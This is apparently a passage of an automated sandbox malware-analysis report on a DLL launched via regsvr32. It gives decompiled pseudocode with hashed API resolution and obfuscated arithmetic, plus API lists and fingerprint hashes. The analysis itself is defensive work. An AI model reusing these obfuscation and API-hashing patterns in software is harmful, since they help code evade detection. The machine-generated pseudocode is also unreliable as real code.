                                				void* _t249;
                                				void* _t251;
                                				long long _t252;
                                				signed int* _t253;
                                				void* _t255;
                                
                                				_t245 = __r9;
                                				 *((long long*)(_t241 + 0x10)) = __rbx;
                                				 *((long long*)(_t241 + 0x18)) = _t232;
                                				 *((long long*)(_t241 + 0x20)) = __rsi;
                                				_push(_t221);
                                				_t242 = _t241 - 0x90;
                                				r13d =  *(_t242 + 0x110);
                                				r11d = __rcx + 0x7bc;
                                				r14d =  *(_t242 + 0x120);
                                				r8d =  *(_t242 + 0xe0);
                                				r9d = _t249 + 0x1137;
                                				r15d = _t249 - 0x21a;
                                				r12d =  *(_t242 + 0xf8);
                                				_t174 =  *(_t242 + 0xe8) + 0x40c;
                                				 *(_t242 + 0x80) = r15d;
                                				 *(_t242 + 0x120) = _t174;
                                				r10d = _t249 + 0xf35;
                                				 *(_t242 + 0x110) = r10d;
                                				_t234 =  *((intOrPtr*)(_t242 + 0xf0)) + 0xffffcf2b;
                                				 *(_t242 + 0xc0) = r11d;
                                				r12d = r12d + 0xffffefef;
                                				if (__rcx - _t174 < 0) goto 0x130ea883;
                                				if (r12d - __r9 - 0x17e6 <= 0) goto 0x130ea789;
                                				_t176 = __rdx + 0x2103;
                                				 *((long long*)(_t242 + 0x60)) = _t176;
                                				r10d = _t221 + 0x38e9;
                                				_t252 =  *((intOrPtr*)(_t242 + 0x108));
                                				 *((long long*)(_t242 + 0x58)) = _t252;
                                				r11d = _t255 + 0x114f;
                                				 *(_t242 + 0x50) = r10d;
                                				r9d = __r8 - 0xde7;
                                				 *(_t242 + 0x48) = r11d;
                                				r8d = __rdx + 0x343a;
                                				 *(_t242 + 0x40) = _t234 + 0x37e1;
                                				 *(_t242 + 0x38) = _t221 + 0x27b2;
                                				 *(_t242 + 0x30) = _t234 + 0x2103;
                                				 *((long long*)(_t242 + 0x28)) = __rcx + 0x2b1;
                                				 *(_t242 + 0x20) = r13d;
                                				E00007FFC7FFC130E11F0(__rcx,  *((intOrPtr*)(_t242 + 0xf0)), _t234 + 0x2103, __rcx + 0x2b1, __r8, _t247, _t249, _t252); // executed
                                				_t218 = _t176;
                                				r9d =  *(_t242 + 0x110);
                                				r9d = r9d + 0xffffeeb1;
                                				 *((long long*)(_t252 + 0x158)) =  *((intOrPtr*)(_t252 + 0x350));
                                				_t49 = _t176 - 0x814; // -2068
                                				_t51 = _t176 - 0x108; // -264
                                				r10d = _t51;
                                				_t177 =  *(_t242 + 0x120);
                                				_t53 = _t218 - 0x113b; // -4411
                                				_t228 = _t53;
                                				 *(_t242 + 0x78) = r10d;
                                				_t55 = _t218 - 0x4af; // -1199
                                				r8d = _t55;
                                				_t201 =  *((intOrPtr*)(_t252 + 0xe0)) + 0x3595;
                                				 *((long long*)(_t252 + 0x58)) = _t201;
                                				r14d =  *(_t242 + 0xc0);
                                				_t147 = _t249 + 0x1137;
                                				r13d =  *(_t242 + 0xe8);
                                				r11d = _t201 - 0x202;
                                				 *(_t242 + 0x70) = r11d;
                                				_t223 = _t177 - 0x1563;
                                				 *((long long*)(_t242 + 0x68)) = _t49;
                                				r15d = _t201 - 0x113b;
                                				_t195 =  *((intOrPtr*)(_t242 + 0x108));
                                				r12d = _t201 - 0x760;
                                				 *((long long*)(_t242 + 0x60)) = _t223;
                                				 *((long long*)(_t242 + 0x58)) = _t228;
                                				r14d = r14d + 0xffffe5d9;
                                				 *(_t242 + 0x50) =  *(_t242 + 0xe0) + 0x24c;
                                				r13d = r13d + 0x2b1;
                                				 *(_t242 + 0x48) = r14d;
                                				 *(_t242 + 0x40) = r15d;
                                				 *(_t242 + 0x38) = _t195;
                                				 *(_t242 + 0x30) = r12d;
                                				 *((long long*)(_t242 + 0x28)) = _t177 + 0xfffff21d;
                                				 *(_t242 + 0x20) = r13d;
                                				_t135 = E00007FFC7FFC130FE7E0(_t201 + 0xffffe749, _t176 + 0xfffff8a0, __r8, _t245, _t255, _t251, _t249); // executed
                                				r15d =  *(_t242 + 0x80);
                                				 *((short*)(_t195 + 0xf8)) = _t135;
                                				_t180 =  *((intOrPtr*)(_t195 + 0xd0)) + 0x108;
                                				 *((long long*)(_t195 + 0x108)) = _t180;
                                				 *_t180 =  *_t180 + _t180;
                                				 *((intOrPtr*)(_t180 + 0x2b)) =  *((intOrPtr*)(_t180 + 0x2b)) + _t147;
                                				 *_t180 = _t135;
                                				 *_t180 =  *_t180 + _t180;
                                				 *((intOrPtr*)(_t180 + 1)) =  *((intOrPtr*)(_t180 + 1)) + _t147;
                                				_t181 =  *_t180;
                                				 *_t181 =  *_t181 + _t181;
                                				bpl = 1;
                                				 *_t181 =  *_t181 + _t135;
                                				_t196 =  *((intOrPtr*)(_t242 + 0x108));
                                				_t182 = r15d;
                                				if (_t182 - ( *(_t196 + 0x188) |  *(_t196 + 0xb8)) < 0) goto 0x130ea93e;
                                				r14d = 0x228c;
                                				r10d = r10d ^ 0x000038e9;
                                				 *(_t242 + 0x110) = r10d;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r10d;
                                				r8d = r8d *  *(_t196 + 0x120);
                                				 *(_t242 + 0x20) = _t163 * r9d;
                                				r9d = _t147 + bpl & 0x0000ffff;
                                				r9d = r9d * (r11w & 0xffffffff);
                                				EnterCriticalSection(_t247);
                                				r8d =  *(_t242 + 0xe0);
                                				r10d =  *(_t242 + 0x110);
                                				r11d =  *(_t242 + 0xc0);
                                				 *(_t196 + 0xe0) =  *(_t196 + 0xe0) | _t249 + 0x00000eb4 ^  *(_t196 + 0x1f8) ^  *(_t196 + 0x1c0);
                                				if (r15d - ( *(_t196 + 0x188) |  *(_t196 + 0xb8)) >= 0) goto 0x130ea7d0;
                                				goto 0x130ea93e;
                                				_t253 =  *((intOrPtr*)(_t242 + 0x108));
                                				if (r15d - _t253[0x38] * _t253[0x18] * _t142 <= 0) goto 0x130ea93e;
                                				r11d = _t253[0x48];
                                				r11d = r11d | r8d;
                                				r10d = _t253[0x1e];
                                				r9d =  *_t253;
                                				r10d = r10d + _t253[6];
                                				r9d = r9d - (_t249 - 0x000027b2 ^  *(_t196 + 0x130) ^  *(_t196 + 0xa8));
                                				r8d =  *(_t242 + 0xc0);
                                				r10d = r10d | 0x00003666;
                                				 *(_t242 + 0x48) = _t223 + 1;
                                				 *(_t242 + 0x40) = _t228 - _t182 -  *((intOrPtr*)(_t196 + 0x110)) | 0x00003666;
                                				 *(_t242 + 0x38) = r11d;
                                				r12d = r12d * (__r8 - 0x40c);
                                				 *(_t242 + 0x30) = _t253;
                                				 *((long long*)(_t242 + 0x28)) = _t196;
                                				 *(_t242 + 0x20) = r10d;
                                				r8d = r8d + r12d;
                                				E00007FFC7FFC130FD230((_t249 - 0x000027b2 ^  *(_t196 + 0x130) ^  *(_t196 + 0xa8)) -  *_t253 ^ _t253[0x62], r15d, _t196, _t163 * r9d ^ 0x000027b2,  *(_t196 + 0x1d0) & 0x0000ffff);
                                				return _t255 + 0x216;
                                			}

                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA81E
                                  • Part of subcall function 00007FFC130E11F0: GetProcessHeap.KERNEL32 ref: 00007FFC130E1490
                                  • Part of subcall function 00007FFC130E11F0: RtlReleasePrivilege.NTDLL ref: 00007FFC130E14A3
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalEnterHeapPrivilegeProcessReleaseSection
                                • String ID:
                                • API String ID: 3441125642-0
                                • Opcode ID: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                                • Instruction ID: 78221295fa8c2ba37ba84bb2e190045f8c22a7c505b6ff4ee90f700e3c5fed37
                                • Opcode Fuzzy Hash: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                                • Instruction Fuzzy Hash: 76B179732086D58AD721CF15E444BEEB7A8F788B48F414125EB8A17B58DB78EA95CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E00007FFC7FFC130F9610(void* __rax, long long __rbx, signed int __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, long long _a16, long long _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, long long _a96) {
                                				long long _v32;
                                				long long _v40;
                                				long long _v48;
                                				long long _v56;
                                				signed int _v64;
                                				signed int _v72;
                                				signed long long _v80;
                                				signed int _v88;
                                				signed int* _v96;
                                				long long _v104;
                                				long long _v112;
                                				long long _v120;
                                				signed int _v128;
                                				signed int _v136;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t85;
                                				signed int _t86;
                                				void* _t87;
                                				signed int _t88;
                                				signed int _t89;
                                				signed int _t91;
                                				long long _t98;
                                				signed int* _t110;
                                				signed int _t136;
                                
                                				_t98 = _a96;
                                				_t87 = __r9 - 0xefd;
                                				r8d = _a80;
                                				r8d = r8d + 0xaeb;
                                				_t136 = _a64 + 0xffffeb3f;
                                				_a16 = __rdx - 0x3189;
                                				r10d = _t98 - 0xbf1;
                                				_a64 = _t136;
                                				_a80 = r10d;
                                				_a96 = _t98 + 0x8d0;
                                				_a32 = _t98;
                                				_a40 = __rcx;
                                				if (__rcx == _t98) goto 0x130f98d3;
                                				_t85 = __r10 + 0x114f;
                                				_a8 = __rbx;
                                				_t110 = _a72;
                                				if (_t136 - _t98 >= 0) goto 0x130f9723;
                                				 *((intOrPtr*)(__rcx + 0x41000031)) =  *((intOrPtr*)(__rcx + 0x41000031)) - _t87;
                                				 *0x2444896600003A11 =  *0x2444896600003A11 & _t85;
                                				spl = spl ^  *0x36e7;
                                				 *0x36e7 =  *0x36e7 + _t85;
                                				 *0x2444C74800003670 =  *((long long*)(0x2444c74800003670)) - 1;
                                				 *0x2444C748000036EA =  *0x2444C748000036EA ^ 0x00000000;
                                				 *0x2444C74800003674 =  *((intOrPtr*)(0x2444c74800003674)) + _t87;
                                				 *0x36e7 =  *0x36e7 + _t85;
                                				_t110[0xcf] = 0;
                                				_t110[0x24] = 1;
                                				 *((intOrPtr*)(_t110[0xc] + 0x100)) =  *((intOrPtr*)(_t110[0xc] + 0x100)) + _t110[0x44];
                                				_t110[0x44] = _t110[0x44] - 1;
                                				goto 0x130f98b8;
                                				_v40 = __r13;
                                				if (_t110[0x54] != ( *_t110 | _t88)) goto 0x130f98cb;
                                				_v32 = __r12;
                                				_v48 = __r14;
                                				_v56 = __r15;
                                				asm("o16 nop [eax+eax]");
                                				if (r8d - (_t110[0x54] & 0x00001f2c) < 0) goto 0x130f987f;
                                				LeaveCriticalSection(??);
                                				r12d = _t110[0x32];
                                				r8d = r12d;
                                				r8d = r8d & _t91;
                                				r9d = _t110[0x74];
                                				r11d = _t110[0x68];
                                				r9d = r9d | _t89;
                                				r11d = r11d | _t110[0x50];
                                				r12d = r12d ^ 0x00001f2c;
                                				r10d = _a64;
                                				r12d = r12d - _t85;
                                				r10d = r10d | 0x00002032;
                                				r11d = r11d - _t110[0x1e];
                                				r14d = _t110[0x78];
                                				r10d = r10d & _a80;
                                				r14d = r14d | _t85;
                                				r15d =  *_t110;
                                				r15d = r15d - _t110[0x16];
                                				r15d = r15d - 0x2103;
                                				_v64 = r11d;
                                				_v72 = r12d;
                                				_v80 = _t110[0x8a] ^ 0x00003666;
                                				_v88 = r10d;
                                				_v96 = _t110;
                                				_v104 = _t110[0x10];
                                				_v112 = _a32 + 0x38e9;
                                				_v120 = _t110[0x54] * _a40 - _a96;
                                				_v128 = r14d;
                                				_v136 = r15d;
                                				_t86 = E00007FFC7FFC130EA4F0(_a32 + 0x38e9, _t110, _a16 + 0xfffff0c7, _t110[0x72] | __rdx - 0x00003189, _t110[0x10], __r8, __r9);
                                				r8d = _t86;
                                				_a80 = _a80 + _t110[0x1e] + _a96;
                                				r13d = r13d + 3;
                                				if (r13d == ( *_t110 | _t88)) goto 0x130f9760;
                                				return _t86;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalLeaveSection
                                • String ID:
                                • API String ID: 3988221542-0
                                • Opcode ID: 473156c768860ec0aa82b0bbaedf760dbbe2600152b2228a14ed45a4eaae335e
                                • Instruction ID: ff27112cde60e09469b74aa2727b065e55600586ecd25aeb54ebdbcb6788062f
                                • Opcode Fuzzy Hash: 473156c768860ec0aa82b0bbaedf760dbbe2600152b2228a14ed45a4eaae335e
                                • Instruction Fuzzy Hash: 616144736086C58BE361CF25E4407DAB7A8F788B48F044139DB8957B58EB38E9A4CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00734A80(void* __ebx, void* __ecx, void* __edx, void* __ebp, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, signed int __r9, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40, unsigned int _a48, unsigned int _a56, signed int _a64) {
                                				signed int _v40;
                                				signed int _t27;
                                				signed int _t30;
                                				signed int _t36;
                                				signed int _t38;
                                				signed int _t39;
                                				void* _t40;
                                				signed int _t48;
                                				void* _t51;
                                				signed int _t52;
                                				void* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr* _t69;
                                				signed int _t71;
                                				signed int _t74;
                                				void* _t76;
                                				intOrPtr _t90;
                                
                                				_t79 = __r8;
                                				_t71 = __rsi;
                                				_t56 = __rcx;
                                				_t40 = __ecx;
                                				_t35 = __ebx;
                                				_t51 = _t76;
                                				 *((long long*)(_t51 + 8)) = __rbx;
                                				 *((long long*)(_t51 + 0x10)) = __rbp;
                                				 *((long long*)(_t51 + 0x18)) = __rsi;
                                				 *((long long*)(_t51 + 0x20)) = __rdi;
                                				_t52 =  *0x73d458;
                                				_t90 =  *__rcx;
                                				_t74 = __r9;
                                				_t54 = __r8;
                                				_t83 = __rdx;
                                				_t69 = __rcx;
                                				if(__rdx == 0) {
                                					L3:
                                					r12d =  *((intOrPtr*)(_t69 + 0x68));
                                					r9d = _a56;
                                					r8d = r12d;
                                					_v40 = _a64;
                                					_t27 = E007331C0(_t35, _t40, __eflags, _t54, _t69, _t54, _t79, _t83); // executed
                                					_t36 = _t27;
                                					__eflags = _t27;
                                					if(_t27 != 0) {
                                						L13:
                                						 *(_t69 + 0x58) = _t36;
                                						return _t36;
                                					}
                                					__eflags = _t74;
                                					if(_t74 == 0) {
                                						L6:
                                						_t38 = _a48 >> 0x14;
                                						__eflags = _t38;
                                						if(_t38 == 0) {
                                							_t39 =  *(_t69 + 0x6c);
                                							_t48 =  *(_t69 + 0x70);
                                						} else {
                                							_t39 = _t38 *  *(_t69 + 0x6c);
                                							_t48 = _t39;
                                						}
                                						E0073908C(0x41b0cf8e, _t52,  *((intOrPtr*)(_t90 + 0x48)));
                                						__eflags = _t52;
                                						if(_t52 != 0) {
                                							r9d = _t39;
                                							r8d = r12d;
                                							_v40 = _t48;
                                							 *_t52();
                                						}
                                						r9d = _a48;
                                						_t30 = E007375F8(_t40, _t52, _t54, _t69, _t71, _a40); // executed
                                						_t36 = _t30;
                                						__eflags = _t71;
                                						if(_t71 != 0) {
                                							__eflags = 0;
                                							HeapFree(??, ??, ??);
                                						}
                                						goto L13;
                                					}
                                					E00736C34(_t36, _t54, _t74, _t69, _t71, _t74, _t79);
                                					_t71 = _t52;
                                					__eflags = _t52;
                                					if(_t52 == 0) {
                                						L2:
                                						_t36 = 8;
                                						goto L13;
                                					}
                                					goto L6;
                                				}
                                				_t6 = _t56 + 0x10; // 0x2
                                				_t79 = _t6;
                                				_t7 = _t56 + 8; // -6
                                				if(E00739B88(__ebx, __r8, __rdx, _t7, __rsi, _t6) != 0) {
                                					goto L3;
                                				}
                                				goto L2;
                                			}





















                                APIs
                                • HeapFree.KERNEL32 ref: 00734B85
                                  • Part of subcall function 00739B88: HeapAlloc.KERNEL32 ref: 00739BEA
                                  • Part of subcall function 00739B88: HeapAlloc.KERNEL32 ref: 00739C04
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                                • Instruction ID: c0e8123a1594f9192a5c82c5012a603a79a4c15f5714eb030c9028894eccaf6b
                                • Opcode Fuzzy Hash: 0438c88f5e4c29cc0bfbf823165f6398d9b9537c29dc3537e3679cfc667b61ef
                                • Instruction Fuzzy Hash: 09316B76704B8586EB18DB6B9580719B7A0F788FD4F4880269F8847B16DB3CE852CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 00732461
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocErrorHeapLast
                                • String ID:
                                • API String ID: 1314224567-0
                                • Opcode ID: 114887a3b61755fca8836de62ef990b92a7ac42fee645ab10b540a5911a616a2
                                • Instruction ID: 63998b8310d2208f499512246b29978498330bccc7e4086d8656c53acca8f821
                                • Opcode Fuzzy Hash: 114887a3b61755fca8836de62ef990b92a7ac42fee645ab10b540a5911a616a2
                                • Instruction Fuzzy Hash: 7C016932714B9489EB189F67A85026977A1FBC8FC0F598025AE4E4371ADF39E942C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00736DF0(void* __ebx, void* __ecx, long long __rbx, intOrPtr* __rcx, signed long long __rdx) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t79;
                                				void* _t81;
                                				void* _t95;
                                				void* _t111;
                                				void* _t112;
                                				intOrPtr _t117;
                                				intOrPtr _t144;
                                				void* _t146;
                                				void* _t147;
                                				long long* _t158;
                                				long long* _t160;
                                				long long _t161;
                                				intOrPtr* _t199;
                                				long long** _t204;
                                				void* _t206;
                                				signed long long _t211;
                                				long long _t214;
                                				void* _t216;
                                				void* _t217;
                                				void* _t237;
                                				intOrPtr _t240;
                                				long long* _t247;
                                
                                				_t202 = __rdx;
                                				_t161 = __rbx;
                                				_t116 = __ecx;
                                				_t237 = _t216;
                                				 *((long long*)(_t237 + 8)) = __rbx;
                                				 *((long long*)(_t237 + 0x10)) = __rdx;
                                				_push(_t206);
                                				_t217 = _t216 - 0x40;
                                				r14d =  *0x73d450;
                                				_t211 = __rdx;
                                				_t204 = __rcx;
                                				 *((long long*)(_t217 + 0x38)) =  *((intOrPtr*)( *0x73d458 + 8));
                                				if(E007391C8(__ecx, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x73d458 + 8)), __rbx, __rdx, __rdx, __rcx, _t206, _t237 - 0x58, _t237 + 0x18, _t237) != 0) {
                                					L64:
                                					_t111 = 1;
                                					L65:
                                					return _t111;
                                				}
                                				_t252 =  *0x73d458;
                                				_t240 =  *((intOrPtr*)(_t217 + 0x20));
                                				_t158 =  *((intOrPtr*)(__rcx));
                                				_t208 =  *((intOrPtr*)( *0x73d458 + 8));
                                				 *((long long*)(_t217 + 0x98)) = _t158;
                                				 *((long long*)(_t217 + 0x30)) =  *((intOrPtr*)( *0x73d458 + 8));
                                				if(_t240 == 0) {
                                					L41:
                                					_t111 = 0x57;
                                					L42:
                                					HeapFree();
                                					if(_t111 != 0) {
                                						goto L65;
                                					}
                                					if(E007391C8(_t116, r14d ^ 0x881e33f6, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237) != 0) {
                                						goto L64;
                                					}
                                					_t79 = E0073672C( *((intOrPtr*)(_t217 + 0x20)), _t202, _t217 + 0x98);
                                					_t117 =  *((intOrPtr*)(_t217 + 0x98));
                                					if(_t79 != 0 || _t117 != 0) {
                                						 *((intOrPtr*)(_t204 + 0x28)) = _t117;
                                						if(E007391C8(_t117, r14d ^ 0xa2dd2342, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237) == 0) {
                                							_t246 =  *0x73d458;
                                							_t46 = _t158 + 0x10; // 0x10
                                							_t112 = _t46;
                                							_t146 =  <  ?  *((void*)(_t217 + 0x90)) : _t112;
                                							E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)( *0x73d458 + 0x10)));
                                							if(_t158 != 0) {
                                								 *_t158();
                                							}
                                							_t202 =  *((intOrPtr*)(_t217 + 0x20));
                                							r8d = _t146;
                                							L007347B0();
                                							if(_t146 < _t112) {
                                								r8d = _t112 - _t146;
                                								E0073487A();
                                							}
                                							E0073908C(0x8d72aad2, _t158,  *((intOrPtr*)(_t246 + 0x10)));
                                							if(_t158 != 0) {
                                								 *_t158();
                                							}
                                							HeapFree();
                                							_t211 =  *((intOrPtr*)(_t217 + 0x88));
                                						}
                                						r14d = r14d ^ 0x1a1a0866;
                                						_t81 = E007391C8(_t117, r14d, _t158, _t161, _t211, _t202, _t204, _t208, _t217 + 0x20, _t217 + 0x90, _t237);
                                						_t111 = _t81;
                                						if(_t81 == 0 && E0073672C( *((intOrPtr*)(_t217 + 0x20)), _t202, _t217 + 0x98) != 0 &&  *((intOrPtr*)(_t217 + 0x98)) != 0) {
                                							_t209 =  *0x73d458;
                                							E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)( *0x73d458 + 0x10)));
                                							if(_t158 != 0) {
                                								 *_t158();
                                							}
                                							E0073908C(0x9c66d81c, _t158,  *((intOrPtr*)(_t209 + 0x18)));
                                							if(_t158 != 0) {
                                								 *_t158();
                                							}
                                							_t160 =  *((intOrPtr*)(_t217 + 0x28)) + _t211 * 0x23c34600;
                                							 *((long long*)(_t217 + 0x28)) = _t160;
                                							 *((long long*)(_t204 + 0x30)) = _t160;
                                							E0073908C(0x8d72aad2, _t160,  *((intOrPtr*)(_t209 + 0x10)));
                                							if(_t160 != 0) {
                                								 *_t160();
                                							}
                                						}
                                						goto L65;
                                					} else {
                                						goto L64;
                                					}
                                				}
                                				r13d = 0xfb849f8f;
                                				E0073908C(r13d, _t158,  *((intOrPtr*)(_t252 + 0x18)));
                                				if(_t158 == 0) {
                                					_t95 = 0;
                                				} else {
                                					_t95 =  *_t158();
                                				}
                                				r8d = _t95 + 1;
                                				HeapAlloc(??, ??, ??);
                                				_t208 = _t158;
                                				 *((long long*)(_t217 + 0x28)) = _t158;
                                				if(_t158 == 0) {
                                					_t111 = 8;
                                					goto L42;
                                				} else {
                                					_t202 = _t240;
                                					L007347B0();
                                					_t189 =  *0x73d458;
                                					_t214 = _t208;
                                					_t161 =  *((intOrPtr*)( *0x73d458 + 8));
                                					while( *_t214 == 0x20 ||  *_t214 == 9) {
                                						_t214 = _t214 + 1;
                                					}
                                					if( *_t214 == 0) {
                                						_t147 = 0;
                                						L29:
                                						_t247 =  *((intOrPtr*)(_t217 + 0x90));
                                						L30:
                                						if(_t147 == 0) {
                                							HeapFree();
                                							_t211 =  *((intOrPtr*)(_t217 + 0x88));
                                							goto L41;
                                						}
                                						E0073908C(0x4a75e5e7, _t158,  *((intOrPtr*)(_t252 + 0x10)));
                                						if(_t158 != 0) {
                                							 *_t158();
                                						}
                                						_t161 =  *((intOrPtr*)(_t204 + 0x40));
                                						 *((long long*)(_t204 + 0x40)) =  *((intOrPtr*)(_t217 + 0x28));
                                						 *((long long*)(_t204 + 0x48)) = _t247;
                                						 *((intOrPtr*)(_t204 + 0x50)) = sil;
                                						if( *((char*)(_t204 + 0x70)) != 0) {
                                							 *((char*)(_t204 + 0x70)) = 0;
                                						}
                                						asm("lock and dword [edi+0x2c], 0xfffffffe");
                                						E0073908C(0x8d72aad2, _t158,  *((intOrPtr*)(_t252 + 0x10)));
                                						if(_t158 != 0) {
                                							 *_t158();
                                						}
                                						if(_t161 != 0) {
                                							_t161 =  *((intOrPtr*)(_t217 + 0x30));
                                							HeapFree(??, ??, ??);
                                							HeapFree(??, ??, ??);
                                						}
                                						_t240 =  *((intOrPtr*)(_t217 + 0x20));
                                						_t211 =  *((intOrPtr*)(_t217 + 0x88));
                                						_t111 = 0;
                                						goto L42;
                                					}
                                					E0073908C(r13d, _t158,  *((intOrPtr*)(_t189 + 0x18)));
                                					if(_t158 == 0) {
                                					} else {
                                						 *_t158();
                                					}
                                					asm("cdq");
                                					_t15 = _t158 + 1; // 0x1
                                					r8d = _t15;
                                					HeapAlloc(??, ??, ??);
                                					_t147 = 0;
                                					_t247 = _t158;
                                					if(_t158 == 0) {
                                						goto L29;
                                					} else {
                                						do {
                                							_t144 =  *_t214;
                                							_t199 = _t214;
                                							if(_t144 == 0) {
                                								L20:
                                								_t116 = 0;
                                								L21:
                                								if(_t199 == 0) {
                                									goto L26;
                                								}
                                								 *_t199 = 0;
                                								_t199 = _t199 + 1;
                                								while( *_t199 == 0x20 ||  *_t199 == 9) {
                                									_t199 = _t199 + 1;
                                								}
                                								goto L26;
                                							}
                                							while(_t144 != 0x20) {
                                								_t199 = _t199 + 1;
                                								_t144 =  *_t199;
                                								if(_t144 != 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							if(_t144 != 0) {
                                								goto L21;
                                							}
                                							goto L20;
                                							L26:
                                							 *_t158 = _t214;
                                							_t147 = _t147 + 1;
                                							_t158 = _t158 + _t161;
                                							_t214 = _t199;
                                						} while (_t199 != 0);
                                						goto L30;
                                					}
                                				}
                                			}





























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 2b94d5c563adb2f9cc699e4549cf52e79e464f4774027de4a12a7639eac05603
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 72B1D366708B8595FB38DF62E4443AA67A1FBC8B84F488026DE8D43706DF3CD949C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EE374(void* __ecx, void* __edx, void* __esp, long long __rbx, long long __rdx, long long __rsi, void* __r8) {
                                				void* __rdi;
                                				void* _t36;
                                				long _t42;
                                				void* _t43;
                                				signed long long _t54;
                                				long long _t57;
                                				long long _t61;
                                				void* _t65;
                                				_Unknown_base(*)()* _t84;
                                				void* _t90;
                                				void* _t91;
                                				void* _t93;
                                				signed long long _t94;
                                				struct _EXCEPTION_POINTERS* _t100;
                                
                                				_t44 = __ecx;
                                				 *((long long*)(_t93 + 0x10)) = __rbx;
                                				 *((long long*)(_t93 + 0x18)) = __rsi;
                                				_t3 = _t93 - 0x4f0; // -1288
                                				_t91 = _t3;
                                				_t94 = _t93 - 0x5f0;
                                				_t54 =  *0x13123760; // 0xe67021d0ea18
                                				 *(_t91 + 0x4e0) = _t54 ^ _t94;
                                				if (_t65 == 0xffffffff) goto 0x130ee3b3;
                                				E00007FFC7FFC130EBC04(_t36);
                                				_t5 = _t94 + 0x70; // 0x58
                                				r8d = 0x98;
                                				E00007FFC7FFC130EC440(__ecx, __edx, r8d, __esp, _t5, 0, _t84, __r8);
                                				_t6 = _t91 + 0x10; // -1272
                                				r8d = 0x4d0;
                                				E00007FFC7FFC130EC440(_t44, __edx, r8d, __esp, _t6, 0, _t84, __r8);
